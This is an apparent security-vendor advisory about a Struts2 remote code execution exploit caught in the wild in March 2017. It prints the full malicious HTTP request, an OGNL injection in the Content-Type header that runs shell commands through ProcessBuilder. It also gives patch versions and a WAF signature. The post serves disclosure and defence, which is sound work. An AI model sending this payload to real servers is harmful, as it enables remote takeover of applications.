Lucene search

K
wallarmlabWallarmWALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851
HistoryMar 09, 2017 - 12:15 a.m.

New Struts2 Remote Code Execution exploit caught in the wild

2017-03-0900:15:54
Wallarm
lab.wallarm.com
1673

0.974 High

EPSS

Percentile

99.9%

Two days ago Apache has published a fix for the new Remote Code Execution vulnerability in Struts2.

Struts2 RCE attacks in the wild

This vulnerability allows attacker to execute arbitrary Java code on the application server.

We can confirm that caught the first exploit for this vulnerability from the wild. And this is crazy. Like previous OGNL exploits this one is also based on the OGNL macroses to construct and call shell command via sequence of Java classes.

Exploit

Wallarm has first caught the exploit on Mar 8, 03:34 am. Please look the sample malicious HTTP request below:

GET /valid-struts.action HTTP/1.1  
User-Agent: any  
Content-Type: %{(#_=‘multipart/form-data’).(#dm=[@ognl](<http://twitter.com/ognl>).OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance([@com](<http://twitter.com/com>).opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmds=(<some malicious code here>).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=([@org](<http://twitter.com/org>).apache.struts2.ServletActionContext@getResponse().getOutputStream())).([@org](<http://twitter.com/org>).apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Mitigation

Please check that you’ve already updated to Struts 2.3.32 or Struts 2.5.10.1

If you are unable to update Struts2 immediately you should apply virtual patch to your WAF. It’s essentially similar to the previous OGNL exploits however it’s likely to not be covered by many existing WAF signatures. If using old-fashion Web Application Firewall make sure to add this string as a new signature:

%{(#_=’multipart/form-data’)

History

Here is a list of all historical OGNL security issues in Struts2:

It means that the OGNL technology are broken altogether.


New Struts2 Remote Code Execution exploit caught in the wild was originally published in Wallarm on Medium, where people are continuing the conversation by highlighting and responding to this story.